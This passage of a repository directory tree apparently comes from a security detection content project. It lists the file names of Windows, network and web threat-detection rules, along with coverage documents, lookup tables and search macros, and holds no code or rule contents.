windows_powershell_logoff_user_via_quser.yml │ ├── windows_powershell_process_with_malicious_string.yml │ ├── windows_powershell_remotesigned_file.yml │ ├── windows_powershell_scheduletask.yml │ ├── windows_powershell_script_block_with_malicious_string.yml │ ├── windows_powershell_wmi_win32_scheduledjob.yml │ ├── windows_powersploit_gpp_discovery.yml │ ├── windows_powerview_ad_access_control_list_enumeration.yml │ ├── windows_powerview_constrained_delegation_discovery.yml │ ├── windows_powerview_kerberos_service_ticket_request.yml │ ├── windows_powerview_spn_discovery.yml │ ├── windows_powerview_unconstrained_delegation_discovery.yml │ ├── windows_private_keys_discovery.yml │ ├── windows_privilege_escalation_suspicious_process_elevation.yml │ ├── windows_privilege_escalation_system_process_without_system_parent.yml │ ├── windows_privilege_escalation_user_process_spawn_system_process.yml │ ├── windows_privileged_group_modification.yml │ ├── windows_process_commandline_discovery.yml │ ├── windows_process_executed_from_removable_media.yml │ ├── windows_process_execution_from_programdata.yml │ ├── windows_process_execution_in_temp_dir.yml │ ├── windows_process_injection_in_non_service_searchindexer.yml │ ├── windows_process_injection_into_commonly_abused_processes.yml │ ├── windows_process_injection_into_notepad.yml │ ├── windows_process_injection_of_wermgr_to_known_browser.yml │ ├── windows_process_injection_remote_thread.yml │ ├── windows_process_injection_wermgr_child_process.yml │ ├── windows_process_injection_with_public_source_path.yml │ ├── windows_process_with_namedpipe_commandline.yml │ ├── windows_process_with_netexec_command_line_parameters.yml │ ├── windows_process_writing_file_to_world_writable_path.yml │ ├── windows_processes_killed_by_industroyer2_malware.yml │ ├── windows_protocol_tunneling_with_plink.yml │ ├── windows_proxy_via_netsh.yml │ ├── windows_proxy_via_registry.yml │ ├── windows_query_registry_browser_list_application.yml │ ├── 
windows_query_registry_uninstall_program_list.yml │ ├── windows_raccine_scheduled_task_deletion.yml │ ├── windows_rapid_authentication_on_multiple_hosts.yml │ ├── windows_rasautou_dll_execution.yml │ ├── windows_raw_access_to_disk_volume_partition.yml │ ├── windows_raw_access_to_master_boot_record_drive.yml │ ├── windows_rdp_connection_successful.yml │ ├── windows_rdp_file_execution.yml │ ├── windows_rdpclient_connection_sequence_events.yml │ ├── windows_registry_bootexecute_modification.yml │ ├── windows_registry_certificate_added.yml │ ├── windows_registry_delete_task_sd.yml │ ├── windows_registry_dotnet_etw_disabled_via_env_variable.yml │ ├── windows_registry_entries_exported_via_reg.yml │ ├── windows_registry_entries_restored_via_reg.yml │ ├── windows_registry_modification_for_safe_mode_persistence.yml │ ├── windows_registry_payload_injection.yml │ ├── windows_registry_sip_provider_modification.yml │ ├── windows_regsvr32_renamed_binary.yml │ ├── windows_remote_access_software_brc4_loaded_dll.yml │ ├── windows_remote_access_software_rms_registry.yml │ ├── windows_remote_assistance_spawning_process.yml │ ├── windows_remote_create_service.yml │ ├── windows_remote_host_computer_management_access.yml │ ├── windows_remote_management_execute_shell.yml │ ├── windows_remote_service_rdpwinst_tool_execution.yml │ ├── windows_remote_services_allow_rdp_in_firewall.yml │ ├── windows_remote_services_allow_remote_assistance.yml │ ├── windows_remote_services_rdp_enable.yml │ ├── windows_renamed_powershell_execution.yml │ ├── windows_replication_through_removable_media.yml │ ├── windows_root_domain_linked_policies_discovery.yml │ ├── windows_rundll32_apply_user_settings_changes.yml │ ├── windows_rundll32_webdav_request.yml │ ├── windows_rundll32_webdav_with_network_connection.yml │ ├── windows_runmru_command_execution.yml │ ├── windows_scheduled_task_created_via_xml.yml │ ├── windows_scheduled_task_dll_module_loaded.yml │ ├── windows_scheduled_task_service_spawned_shell.yml │ 
├── windows_scheduled_task_with_highest_privileges.yml │ ├── windows_scheduled_task_with_suspicious_command.yml │ ├── windows_scheduled_task_with_suspicious_name.yml │ ├── windows_scheduled_tasks_for_compmgmtlauncher_or_eventvwr.yml │ ├── windows_schtasks_create_run_as_system.yml │ ├── windows_scmanager_security_descriptor_tampering_via_sc_exe.yml │ ├── windows_screen_capture_in_temp_folder.yml │ ├── windows_screen_capture_via_powershell.yml │ ├── windows_security_account_manager_stopped.yml │ ├── windows_security_and_backup_services_stop.yml │ ├── windows_security_support_provider_reg_query.yml │ ├── windows_sensitive_group_discovery_with_net.yml │ ├── windows_sensitive_registry_hive_dump_via_commandline.yml │ ├── windows_server_software_component_gacutil_install_to_gac.yml │ ├── windows_service_create_kernel_mode_driver.yml │ ├── windows_service_create_remcomsvc.yml │ ├── windows_service_create_sliverc2.yml │ ├── windows_service_create_with_tscon.yml │ ├── windows_service_created_with_suspicious_service_name.yml │ ├── windows_service_created_with_suspicious_service_path.yml │ ├── windows_service_creation_on_remote_endpoint.yml │ ├── windows_service_creation_using_registry_entry.yml │ ├── windows_service_deletion_in_registry.yml │ ├── windows_service_execution_remcom.yml │ ├── windows_service_initiation_on_remote_endpoint.yml │ ├── windows_service_stop_attempt.yml │ ├── windows_service_stop_by_deletion.yml │ ├── windows_service_stop_win_updates.yml │ ├── windows_set_account_password_policy_to_unlimited_via_net.yml │ ├── windows_shell_process_from_crushftp.yml │ ├── windows_sip_provider_inventory.yml │ ├── windows_sip_winverifytrust_failed_trust_validation.yml │ ├── windows_snake_malware_file_modification_crmlog.yml │ ├── windows_snake_malware_kernel_driver_comadmin.yml │ ├── windows_snake_malware_registry_modification_wav_openwithprogids.yml │ ├── windows_snake_malware_service_create.yml │ ├── windows_snappybee_create_test_registry.yml │ ├── 
windows_soaphound_binary_execution.yml │ ├── windows_spearphishing_attachment_onenote_spawn_mshta.yml │ ├── windows_special_privileged_logon_on_multiple_hosts.yml │ ├── windows_sql_server_configuration_option_hunt.yml │ ├── windows_sql_server_critical_procedures_enabled.yml │ ├── windows_sql_server_extended_procedure_dll_loading_hunt.yml │ ├── windows_sql_server_startup_procedure.yml │ ├── windows_sql_server_xp_cmdshell_config_change.yml │ ├── windows_sql_spawning_certutil.yml │ ├── windows_sqlcmd_execution.yml │ ├── windows_sqlservr_spawning_shell.yml │ ├── windows_sqlwriter_sqldumper_dll_sideload.yml │ ├── windows_ssh_proxy_command.yml │ ├── windows_steal_authentication_certificates___esc1_abuse.yml │ ├── windows_steal_authentication_certificates___esc1_authentication.yml │ ├── windows_steal_authentication_certificates_certificate_issued.yml │ ├── windows_steal_authentication_certificates_certificate_request.yml │ ├── windows_steal_authentication_certificates_certutil_backup.yml │ ├── windows_steal_authentication_certificates_cryptoapi.yml │ ├── windows_steal_authentication_certificates_cs_backup.yml │ ├── windows_steal_authentication_certificates_export_certificate.yml │ ├── windows_steal_authentication_certificates_export_pfxcertificate.yml │ ├── windows_steal_or_forge_kerberos_tickets_klist.yml │ ├── windows_subinacl_execution.yml │ ├── windows_suspect_process_with_authentication_traffic.yml │ ├── windows_suspicious_child_process_spawned_from_webserver.yml │ ├── windows_suspicious_driver_loaded_path.yml │ ├── windows_suspicious_process_file_path.yml │ ├── windows_svchost_exe_parent_process_anomaly.yml │ ├── windows_system_binary_proxy_execution_compiled_html_file_decompile.yml │ ├── windows_system_discovery_using_ldap_nslookup.yml │ ├── windows_system_discovery_using_qwinsta.yml │ ├── windows_system_file_on_disk.yml │ ├── windows_system_logoff_commandline.yml │ ├── windows_system_network_config_discovery_display_dns.yml │ ├── 
windows_system_network_connections_discovery_netsh.yml │ ├── windows_system_reboot_commandline.yml │ ├── windows_system_remote_discovery_with_query.yml │ ├── windows_system_script_proxy_execution_syncappvpublishingserver.yml │ ├── windows_system_shutdown_commandline.yml │ ├── windows_system_time_discovery_w32tm_delay.yml │ ├── windows_system_user_discovery_via_quser.yml │ ├── windows_system_user_privilege_discovery.yml │ ├── windows_terminating_lsass_process.yml │ ├── windows_time_based_evasion.yml │ ├── windows_time_based_evasion_via_choice_exec.yml │ ├── windows_uac_bypass_suspicious_child_process.yml │ ├── windows_uac_bypass_suspicious_escalation_behavior.yml │ ├── windows_unsecured_outlook_credentials_access_in_registry.yml │ ├── windows_unsigned_dll_side_loading.yml │ ├── windows_unsigned_dll_side_loading_in_same_process_path.yml │ ├── windows_unsigned_ms_dll_side_loading.yml │ ├── windows_unusual_count_of_disabled_users_failed_auth_using_kerberos.yml │ ├── windows_unusual_count_of_invalid_users_fail_to_auth_using_kerberos.yml │ ├── windows_unusual_count_of_invalid_users_failed_to_auth_using_ntlm.yml │ ├── windows_unusual_count_of_users_fail_to_auth_wth_explicitcredentials.yml │ ├── windows_unusual_count_of_users_failed_to_auth_using_kerberos.yml │ ├── windows_unusual_count_of_users_failed_to_authenticate_from_process.yml │ ├── windows_unusual_count_of_users_failed_to_authenticate_using_ntlm.yml │ ├── windows_unusual_count_of_users_remotely_failed_to_auth_from_host.yml │ ├── windows_unusual_ntlm_authentication_destinations_by_source.yml │ ├── windows_unusual_ntlm_authentication_destinations_by_user.yml │ ├── windows_unusual_ntlm_authentication_users_by_destination.yml │ ├── windows_unusual_ntlm_authentication_users_by_source.yml │ ├── windows_unusual_syswow64_process_run_system32_executable.yml │ ├── windows_usbstor_registry_key_modification.yml │ ├── windows_user_deletion_via_net.yml │ ├── windows_user_disabled_via_net.yml │ ├── 
windows_user_discovery_via_net.yml │ ├── windows_user_execution_malicious_url_shortcut_file.yml │ ├── windows_vulnerable_3cx_software.yml │ ├── windows_vulnerable_driver_installed.yml │ ├── windows_vulnerable_driver_loaded.yml │ ├── windows_windbg_spawning_autoit3.yml │ ├── windows_winlogon_with_public_network_connection.yml │ ├── windows_wmi_impersonate_token.yml │ ├── windows_wmi_process_and_service_list.yml │ ├── windows_wmi_process_call_create.yml │ ├── windows_wmic_shadowcopy_delete.yml │ ├── windows_wpdbusenum_registry_key_modification.yml │ ├── winevent_scheduled_task_created_to_spawn_shell.yml │ ├── winevent_scheduled_task_created_within_public_path.yml │ ├── winevent_windows_task_scheduler_event_action_started.yml │ ├── winhlp32_spawning_a_process.yml │ ├── winrar_spawning_shell_application.yml │ ├── winrm_spawning_a_process.yml │ ├── wmi_permanent_event_subscription.yml │ ├── wmi_permanent_event_subscription___sysmon.yml │ ├── wmi_recon_running_process_or_services.yml │ ├── wmi_temporary_event_subscription.yml │ ├── wmic_group_discovery.yml │ ├── wmic_noninteractive_app_uninstallation.yml │ ├── wmic_xsl_execution_via_url.yml │ ├── wmiprsve_lolbas_execution_process_spawn.yml │ ├── wscript_or_cscript_suspicious_child_process.yml │ ├── wsmprovhost_lolbas_execution_process_spawn.yml │ ├── wsreset_uac_bypass.yml │ ├── xmrig_driver_loaded.yml │ └── xsl_script_execution_with_wmic.yml ├── network │ ├── 3cx_supply_chain_attack_network_indicators.yml │ ├── cisco_secure_firewall___binary_file_type_download.yml │ ├── cisco_secure_firewall___bits_network_activity.yml │ ├── cisco_secure_firewall___blacklisted_ssl_certificate_fingerprint.yml │ ├── cisco_secure_firewall___blocked_connection.yml │ ├── cisco_secure_firewall___communication_over_suspicious_ports.yml │ ├── cisco_secure_firewall___connection_to_file_sharing_domain.yml │ ├── cisco_secure_firewall___file_download_over_uncommon_port.yml │ ├── cisco_secure_firewall___high_eve_threat_confidence.yml │ ├── 
cisco_secure_firewall___high_priority_intrusion_classification.yml │ ├── cisco_secure_firewall___high_volume_of_intrusion_events_per_host.yml │ ├── cisco_secure_firewall___intrusion_events_by_threat_activity.yml │ ├── cisco_secure_firewall___lumma_stealer_activity.yml │ ├── cisco_secure_firewall___lumma_stealer_download_attempt.yml │ ├── cisco_secure_firewall___lumma_stealer_outbound_connection_attempt.yml │ ├── cisco_secure_firewall___malware_file_downloaded.yml │ ├── cisco_secure_firewall___possibly_compromised_host.yml │ ├── cisco_secure_firewall___potential_data_exfiltration.yml │ ├── cisco_secure_firewall___rare_snort_rule_triggered.yml │ ├── cisco_secure_firewall___remote_access_software_usage_traffic.yml │ ├── cisco_secure_firewall___repeated_blocked_connections.yml │ ├── cisco_secure_firewall___repeated_malware_downloads.yml │ ├── cisco_secure_firewall___snort_rule_triggered_across_multiple_hosts.yml │ ├── cisco_secure_firewall___veeam_cve_2023_27532_exploitation_activity.yml │ ├── cisco_secure_firewall___wget_or_curl_download.yml │ ├── detect_arp_poisoning.yml │ ├── detect_dga_domains_using_pretrained_model_in_dsdl.yml │ ├── detect_dns_data_exfiltration_using_pretrained_model_in_dsdl.yml │ ├── detect_dns_query_to_decommissioned_s3_bucket.yml │ ├── detect_hosts_connecting_to_dynamic_domain_providers.yml │ ├── detect_ipv6_network_infrastructure_threats.yml │ ├── detect_large_icmp_traffic.yml │ ├── detect_outbound_ldap_traffic.yml │ ├── detect_outbound_smb_traffic.yml │ ├── detect_port_security_violation.yml │ ├── detect_remote_access_software_usage_dns.yml │ ├── detect_remote_access_software_usage_traffic.yml │ ├── detect_rogue_dhcp_server.yml │ ├── detect_snicat_sni_exfiltration.yml │ ├── detect_software_download_to_network_device.yml │ ├── detect_suspicious_dns_txt_records_using_pretrained_model_in_dsdl.yml │ ├── detect_traffic_mirroring.yml │ ├── detect_unauthorized_assets_by_mac_address.yml │ ├── detect_windows_dns_sigred_via_splunk_stream.yml │ ├── 
detect_windows_dns_sigred_via_zeek.yml │ ├── detect_zerologon_via_zeek.yml │ ├── dns_query_length_outliers___mltk.yml │ ├── dns_query_length_with_high_standard_deviation.yml │ ├── excessive_dns_failures.yml │ ├── f5_big_ip_icontrol_rest_vulnerability_cve_2022_1388.yml │ ├── hosts_receiving_high_volume_of_network_traffic_from_email_server.yml │ ├── internal_horizontal_port_scan.yml │ ├── internal_horizontal_port_scan_nmap_top_20.yml │ ├── internal_vertical_port_scan.yml │ ├── internal_vulnerability_scan.yml │ ├── large_volume_of_dns_any_queries.yml │ ├── ngrok_reverse_proxy_on_network.yml │ ├── prohibited_network_traffic_allowed.yml │ ├── protocol_or_port_mismatch.yml │ ├── protocols_passing_authentication_in_cleartext.yml │ ├── remote_desktop_network_traffic.yml │ ├── rundll32_dnsquery.yml │ ├── smb_traffic_spike.yml │ ├── smb_traffic_spike___mltk.yml │ ├── ssl_certificates_with_punycode.yml │ ├── suspicious_process_dns_query_known_abuse_web_services.yml │ ├── suspicious_process_with_discord_dns_query.yml │ ├── tor_traffic.yml │ ├── wermgr_process_connecting_to_ip_check_web_services.yml │ ├── windows_abused_web_services.yml │ ├── windows_ad_replication_service_traffic.yml │ ├── windows_ad_rogue_domain_controller_network_activity.yml │ ├── windows_dns_query_request_by_telegram_bot_api.yml │ ├── windows_gather_victim_network_info_through_ip_check_web_services.yml │ ├── windows_multi_hop_proxy_tor_website_query.yml │ ├── windows_remote_desktop_network_bruteforce_attempt.yml │ ├── windows_spearphishing_attachment_connect_to_none_ms_office_domain.yml │ └── zeek_x509_certificate_with_punycode.yml └── web │ ├── access_to_vulnerable_ivanti_connect_secure_bookmark_endpoint.yml │ ├── adobe_coldfusion_access_control_bypass.yml │ ├── adobe_coldfusion_unauthenticated_arbitrary_file_read.yml │ ├── cisco_ios_xe_implant_access.yml │ ├── citrix_adc_and_gateway_unauthorized_data_disclosure.yml │ ├── citrix_adc_exploitation_cve_2023_3519.yml │ ├── 
citrix_sharefile_exploitation_cve_2023_24489.yml │ ├── confluence_cve_2023_22515_trigger_vulnerability.yml │ ├── confluence_data_center_and_server_privilege_escalation.yml │ ├── confluence_pre_auth_rce_via_ognl_injection_cve_2023_22527.yml │ ├── confluence_unauthenticated_remote_code_execution_cve_2022_26134.yml │ ├── connectwise_screenconnect_authentication_bypass.yml │ ├── crushftp_authentication_bypass_exploitation.yml │ ├── crushftp_max_simultaneous_users_from_ip.yml │ ├── detect_attackers_scanning_for_vulnerable_jboss_servers.yml │ ├── detect_f5_tmui_rce_cve_2020_5902.yml │ ├── detect_malicious_requests_to_exploit_jboss_servers.yml │ ├── detect_remote_access_software_usage_url.yml │ ├── detect_web_access_to_decommissioned_s3_bucket.yml │ ├── exploit_public_facing_application_via_apache_commons_text.yml │ ├── exploit_public_facing_fortinet_fortinac_cve_2022_39952.yml │ ├── f5_tmui_authentication_bypass.yml │ ├── fortinet_appliance_auth_bypass.yml │ ├── high_volume_of_bytes_out_to_url.yml │ ├── hunting_for_log4shell.yml │ ├── ivanti_connect_secure_command_injection_attempts.yml │ ├── ivanti_connect_secure_ssrf_in_saml_component.yml │ ├── ivanti_connect_secure_system_information_access_via_auth_bypass.yml │ ├── ivanti_epm_sql_injection_remote_code_execution.yml │ ├── ivanti_epmm_remote_unauthenticated_api_access_cve_2023_35078.yml │ ├── ivanti_epmm_remote_unauthenticated_api_access_cve_2023_35082.yml │ ├── ivanti_sentry_authentication_bypass.yml │ ├── java_class_file_download_by_java_user_agent.yml │ ├── jenkins_arbitrary_file_read_cve_2024_23897.yml │ ├── jetbrains_teamcity_authentication_bypass_cve_2024_27198.yml │ ├── jetbrains_teamcity_authentication_bypass_suricata_cve_2024_27198.yml │ ├── jetbrains_teamcity_limited_auth_bypass_suricata_cve_2024_27199.yml │ ├── jetbrains_teamcity_rce_attempt.yml │ ├── juniper_networks_remote_code_execution_exploit_detection.yml │ ├── log4shell_jndi_payload_injection_attempt.yml │ ├── 
log4shell_jndi_payload_injection_with_outbound_connection.yml │ ├── microsoft_sharepoint_server_elevation_of_privilege.yml │ ├── monitor_web_traffic_for_brand_abuse.yml │ ├── multiple_archive_files_http_post_traffic.yml │ ├── nginx_connectwise_screenconnect_authentication_bypass.yml │ ├── papercut_ng_remote_web_access_attempt.yml │ ├── plain_http_post_exfiltrated_data.yml │ ├── proxyshell_proxynotshell_behavior_detected.yml │ ├── sap_netweaver_visual_composer_exploitation_attempt.yml │ ├── spring4shell_payload_url_request.yml │ ├── sql_injection_with_long_urls.yml │ ├── supernova_webshell.yml │ ├── tomcat_session_deserialization_attempt.yml │ ├── tomcat_session_file_upload_attempt.yml │ ├── unusually_long_content_type_length.yml │ ├── vmware_aria_operations_exploit_attempt.yml │ ├── vmware_server_side_template_injection_hunt.yml │ ├── vmware_workspace_one_freemarker_server_side_template_injection.yml │ ├── web_jsp_request_via_url.yml │ ├── web_remote_shellservlet_access.yml │ ├── web_spring4shell_http_request_class_module.yml │ ├── web_spring_cloud_function_functionrouter.yml │ ├── windows_exchange_autodiscover_ssrf_abuse.yml │ ├── windows_iis_server_pswa_console_access.yml │ ├── wordpress_bricks_builder_plugin_rce.yml │ ├── ws_ftp_remote_code_execution.yml │ ├── zscaler_adware_activities_threat_blocked.yml │ ├── zscaler_behavior_analysis_threat_blocked.yml │ ├── zscaler_cryptominer_downloaded_threat_blocked.yml │ ├── zscaler_employment_search_web_activity.yml │ ├── zscaler_exploit_threat_blocked.yml │ ├── zscaler_legal_liability_threat_blocked.yml │ ├── zscaler_malware_activity_threat_blocked.yml │ ├── zscaler_phishing_activity_threat_blocked.yml │ ├── zscaler_potentially_abused_file_download.yml │ ├── zscaler_privacy_risk_destinations_threat_blocked.yml │ ├── zscaler_scam_destinations_threat_blocked.yml │ └── zscaler_virus_download_threat_blocked.yml ├── dist └── .gitkeep ├── docs ├── .gitignore ├── mitre-map │ ├── cisa-2021-top-malware-coverage │ │ ├── 
AgentTesla_sec_content_mitre_coverage.json │ │ ├── Azorult_sec_content_mitre_coverage.json │ │ ├── Qakbot_sec_content_mitre_coverage.json │ │ ├── Remcos_sec_content_mitre_coverage.json │ │ └── Trickbot_sec_content_mitre_coverage.json │ ├── coverage.png │ └── rats-stealer-detection-coverage │ │ ├── Amadey_sec_content_mitre_coverage.json │ │ ├── AsyncRAT_sec_content_mitre_coverage.json │ │ ├── DarkCrystal RAT_sec_content_mitre_coverage.json │ │ ├── DarkGate Malware_sec_content_mitre_coverage.json │ │ ├── NjRAT_sec_content_mitre_coverage.json │ │ ├── PlugX_sec_content_mitre_coverage.json │ │ ├── Warzone_RAT_sec_content_mitre_coverage.json │ │ └── mitre_tid_tactic_technique.json ├── static │ ├── attack_range.png │ ├── escu_app_logo.png │ ├── escu_sb.png │ ├── feature_detection.png │ ├── feature_playbooks.png │ ├── feature_stories.png │ ├── logo.png │ ├── splunk_banner.png │ ├── structure.png │ └── team_photo.png └── yaml-spec │ ├── detection_spec.yml │ ├── lookups_spec.yml │ ├── macros_spec.yml │ └── stories_spec.yml ├── lookups ├── 3cx_ioc_domains.csv ├── 3cx_ioc_domains.yml ├── __mlspl_detect_dns_data_exfiltration_using_pretrained_model_in_dsdl.mlmodel ├── __mlspl_detect_dns_data_exfiltration_using_pretrained_model_in_dsdl.yml ├── __mlspl_detect_suspicious_dns_txt_records_using_pretrained_model_in_dsdl.mlmodel ├── __mlspl_detect_suspicious_dns_txt_records_using_pretrained_model_in_dsdl.yml ├── __mlspl_detect_suspicious_processnames_using_pretrained_model_in_dsdl.mlmodel ├── __mlspl_detect_suspicious_processnames_using_pretrained_model_in_dsdl.yml ├── __mlspl_pretrained_dga_model_dsdl.mlmodel ├── __mlspl_pretrained_dga_model_dsdl.yml ├── __mlspl_unusual_commandline_detection.mlmodel ├── __mlspl_unusual_commandline_detection.yml ├── ace_access_rights_lookup.csv ├── ace_access_rights_lookup.yml ├── ace_flag_lookup.csv ├── ace_flag_lookup.yml ├── ace_type_lookup.csv ├── ace_type_lookup.yml ├── advanced_audit_policy_guids.csv ├── advanced_audit_policy_guids.yml ├── 
api_call_by_user_baseline.yml ├── applockereventcodes.csv ├── applockereventcodes.yml ├── asr_rules.csv ├── asr_rules.yml ├── attacker_tools.csv ├── attacker_tools.yml ├── aws_service_accounts.csv ├── aws_service_accounts.yml ├── baseline_blocked_outbound_connections.csv ├── baseline_blocked_outbound_connections.yml ├── brandmonitoring_lookup.csv ├── brandmonitoring_lookup.yml ├── browser_app_list.csv ├── browser_app_list.yml ├── builtin_groups_lookup.csv ├── builtin_groups_lookup.yml ├── char_conversion_matrix.csv ├── char_conversion_matrix.yml ├── cisco_secure_firewall_appid_remote_mgmt_and_desktop_tools.csv ├── cisco_secure_firewall_appid_remote_mgmt_and_desktop_tools.yml ├── cisco_secure_firewall_filetype_lookup.csv ├── cisco_secure_firewall_filetype_lookup.yml ├── cisco_snort_ids_to_threat_mapping.csv ├── cisco_snort_ids_to_threat_mapping.yml ├── cloud_instances_enough_data.yml ├── decommissioned_buckets.yml ├── discovered_dns_records.csv ├── discovered_dns_records.yml ├── domain_admins.csv ├── domain_admins.yml ├── domains.csv ├── domains.yml ├── dynamic_dns_providers_default.csv ├── dynamic_dns_providers_default.yml ├── dynamic_dns_providers_local.csv ├── dynamic_dns_providers_local.yml ├── hijacklibs.csv ├── hijacklibs.yml ├── hijacklibs_loaded.csv ├── hijacklibs_loaded.yml ├── images_to_repository.csv ├── images_to_repository.yml ├── is_net_windows_file.csv ├── is_net_windows_file.yml ├── is_nirsoft_software.csv ├── is_nirsoft_software.yml ├── is_suspicious_file_extension_lookup.csv ├── is_suspicious_file_extension_lookup.yml ├── is_windows_system_file.csv ├── is_windows_system_file.yml ├── k8s_container_network_io_baseline.yml ├── k8s_container_network_io_ratio_baseline.yml ├── k8s_process_resource_baseline.yml ├── k8s_process_resource_ratio_baseline.yml ├── legit_domains.csv ├── legit_domains.yml ├── linux_tool_discovery_process.csv ├── linux_tool_discovery_process.yml ├── local_file_inclusion_paths.csv ├── local_file_inclusion_paths.yml ├── 
lolbas_file_path.csv ├── lolbas_file_path.yml ├── loldrivers.csv ├── loldrivers.yml ├── lookup_rare_process_allow_list_default.csv ├── lookup_rare_process_allow_list_default.yml ├── lookup_rare_process_allow_list_local.csv ├── lookup_rare_process_allow_list_local.yml ├── lookup_uncommon_processes_default.csv ├── lookup_uncommon_processes_default.yml ├── lookup_uncommon_processes_local.csv ├── lookup_uncommon_processes_local.yml ├── malicious_powershell_strings.csv ├── malicious_powershell_strings.yml ├── mandatory_job_for_workflow.csv ├── mandatory_job_for_workflow.yml ├── mandatory_step_for_job.csv ├── mandatory_step_for_job.yml ├── msad_guid_lookup.csv ├── msad_guid_lookup.yml ├── network_acl_activity_baseline.csv ├── network_acl_activity_baseline.yml ├── previously_seen_api_calls_from_user_roles.yml ├── previously_seen_aws_cross_account_activity.yml ├── previously_seen_aws_regions.yml ├── previously_seen_cloud_api_calls_per_user_role.yml ├── previously_seen_cloud_compute_creations_by_user.yml ├── previously_seen_cloud_compute_images.yml ├── previously_seen_cloud_compute_instance_types.yml ├── previously_seen_cloud_instance_modifications_by_user.yml ├── previously_seen_cloud_provisioning_activity_sources.yml ├── previously_seen_cloud_regions.yml ├── previously_seen_cmd_line_arguments.csv ├── previously_seen_cmd_line_arguments.yml ├── previously_seen_ec2_amis_lookup.yml ├── previously_seen_ec2_instance_types_lookup.yml ├── previously_seen_ec2_launches_by_user_lookup.yml ├── previously_seen_ec2_modifications_by_user.csv ├── previously_seen_ec2_modifications_by_user.yml ├── previously_seen_gcp_storage_access_from_remote_ip.yml ├── previously_seen_provisioning_activity_src.yml ├── previously_seen_running_windows_services.yml ├── previously_seen_s3_access_from_remote_ip.yml ├── previously_seen_users_console_logins.yml ├── privileged_azure_ad_roles.csv ├── privileged_azure_ad_roles.yml ├── prohibited_apps_launching_cmd.csv ├── prohibited_apps_launching_cmd.yml ├── 
prohibited_processes.csv ├── prohibited_processes.yml ├── ransomware_extensions_lookup.csv ├── ransomware_extensions_lookup.yml ├── ransomware_notes_lookup.csv ├── ransomware_notes_lookup.yml ├── remote_access_software.csv ├── remote_access_software.yml ├── remote_access_software_exceptions.yml ├── s3_deletion_baseline.yml ├── security_group_activity_baseline.yml ├── security_services_lookup.csv ├── security_services_lookup.yml ├── sslbl_ssl_certificate_blacklist.csv ├── sslbl_ssl_certificate_blacklist.yml ├── suspicious_writes_lookup.csv ├── suspicious_writes_lookup.yml ├── threat_snort_count.csv ├── threat_snort_count.yml ├── windows_protocol_handlers.csv ├── windows_protocol_handlers.yml ├── windows_suspicious_services.csv ├── windows_suspicious_services.yml ├── windows_suspicious_tasks.csv ├── windows_suspicious_tasks.yml └── zoom_first_time_child_process.yml ├── macros ├── admon.yml ├── amazon_security_lake.yml ├── appdynamics_security.yml ├── applocker.yml ├── aws_cloudwatchlogs_eks.yml ├── aws_config.yml ├── aws_description.yml ├── aws_ecr_users.yml ├── aws_ecr_users_asl.yml ├── aws_s3_accesslogs.yml ├── aws_securityhub_finding.yml ├── aws_securityhub_firehose.yml ├── azure_audit.yml ├── azure_monitor_aad.yml ├── azure_monitor_activity.yml ├── azuread.yml ├── base64decode.yml ├── bootloader_inventory.yml ├── brand_abuse_dns.yml ├── brand_abuse_email.yml ├── brand_abuse_web.yml ├── capi2_operational.yml ├── certificateservices_lifecycle.yml ├── circleci.yml ├── cisco_ai_defense.yml ├── cisco_networks.yml ├── cisco_secure_firewall.yml ├── cisco_secure_firewall_inside_to_outside.yml ├── cloud_api_calls_from_previously_unseen_user_roles_activity_window.yml ├── cloudtrail.yml ├── cloudwatch_eks.yml ├── cloudwatch_vpc.yml ├── cloudwatchlogs_vpcflow.yml ├── crowdstrike_identities.yml ├── crowdstrike_stream.yml ├── crushftp.yml ├── driverinventory.yml ├── dynamic_dns_providers.yml ├── dynamic_dns_web_traffic.yml ├── ec2_modification_api_calls.yml ├── 
evilginx_phishlets_0365.yml ├── evilginx_phishlets_amazon.yml ├── evilginx_phishlets_aws.yml ├── evilginx_phishlets_facebook.yml ├── evilginx_phishlets_github.yml ├── evilginx_phishlets_google.yml ├── evilginx_phishlets_outlook.yml ├── f5_bigip_rogue.yml ├── fillnull_config.yml ├── filter_rare_process_allow_list.yml ├── github.yml ├── github_enterprise.yml ├── github_known_users.yml ├── github_organizations.yml ├── google_gcp_pubnet_message.yml ├── google_gcp_pubsub_message.yml ├── gsuite_calendar.yml ├── gsuite_drive.yml ├── gsuite_gmail.yml ├── gws_login_mfa_methods.yml ├── gws_reports_admin.yml ├── gws_reports_login.yml ├── iis_get_webglobalmodule.yml ├── iis_operational_logs.yml ├── important_audit_policy_subcategory_guids.yml ├── is_net_windows_file_macro.yml ├── is_nirsoft_software_macro.yml ├── is_windows_system_file_macro.yml ├── ivanti_vtm_audit.yml ├── kube_allowed_images.yml ├── kube_allowed_locations.yml ├── kube_allowed_user_agents.yml ├── kube_allowed_user_groups.yml ├── kube_allowed_user_names.yml ├── kube_audit.yml ├── kube_container_falco.yml ├── kube_objects_events.yml ├── kubernetes_azure.yml ├── kubernetes_container_controller.yml ├── kubernetes_metrics.yml ├── linux_auditd.yml ├── linux_auditd_normalized_execve_process.yml ├── linux_auditd_normalized_proctitle_process.yml ├── linux_hosts.yml ├── linux_shells.yml ├── moveit_sftp_logs.yml ├── ms365_defender_incident_alerts.yml ├── ms_defender.yml ├── ms_defender_atp_alerts.yml ├── msexchange_management.yml ├── netbackup.yml ├── network_acl_events.yml ├── nginx_access_logs.yml ├── normalized_service_binary_field.yml ├── ntlm_audit.yml ├── o365_graph.yml ├── o365_management_activity.yml ├── o365_messagetrace.yml ├── o365_suspect_search_terms_regex.yml ├── okta.yml ├── oldsummaries_config.yml ├── osquery_macro.yml ├── osquery_process.yml ├── papercutng.yml ├── pingid.yml ├── potential_password_in_username_false_positive_reduction.yml ├── potentially_malicious_code_on_cmdline_tokenize_score.yml ├── 
powershell.yml ├── previously_seen_cloud_api_calls_per_user_role_forget_window.yml ├── previously_seen_cloud_compute_creations_by_user_search_window_begin_offset.yml ├── previously_seen_cloud_compute_image_search_window_begin_offset.yml ├── previously_seen_cloud_compute_images_forget_window.yml ├── previously_seen_cloud_compute_instance_type_forget_window.yml ├── previously_seen_cloud_compute_instance_types_search_window_begin_offset.yml ├── previously_seen_cloud_instance_modifications_by_user_search_window_begin_offset.yml ├── previously_seen_cloud_provisioning_activity_forget_window.yml ├── previously_seen_cloud_region_forget_window.yml ├── previously_seen_cloud_regions_search_window_begin_offset.yml ├── previously_seen_windows_services_forget_window.yml ├── previously_seen_windows_services_window.yml ├── previously_seen_zoom_child_processes_forget_window.yml ├── previously_seen_zoom_child_processes_window.yml ├── previously_unseen_cloud_provisioning_activity_window.yml ├── printservice.yml ├── 